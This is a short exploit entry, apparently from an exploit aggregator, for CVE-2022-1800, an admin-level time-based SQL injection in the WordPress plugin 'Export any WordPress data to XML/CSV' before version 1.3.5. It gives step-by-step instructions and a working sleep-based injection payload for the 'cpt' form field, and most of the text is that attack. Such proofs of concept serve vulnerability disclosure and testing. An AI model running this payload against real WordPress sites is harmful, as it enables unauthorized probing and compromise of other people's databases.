Exploit for Export any WordPress data to XML/CSV < 1.3.5 - Admin+ SQL Injection CVE-2022-1800

Name: Exploit for Export any WordPress data to XML/CSV < 1.3.5 - Admin+ SQL Injection CVE-2022-1800
Rating: 5 (277 reviews)

2022-05-20 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:4267109C-0CA2-441D-889D-FB39C235F128
1. Go to the All Export > New Export screen in the WordPress admin.
2. Now click on Specific Post Type > Posts.
3. Click now on Migrate Posts and intercept this request and look for the name cpt:

Content-Disposition: form-data; name="cpt"
post

Change it to:

Content-Disposition: form-data; name="cpt"
post'+(select*from(select(sleep(10)))a)+'

Now you will see a later response of 10 seconds, thus confirming the authenticity of the sqli vulnerability.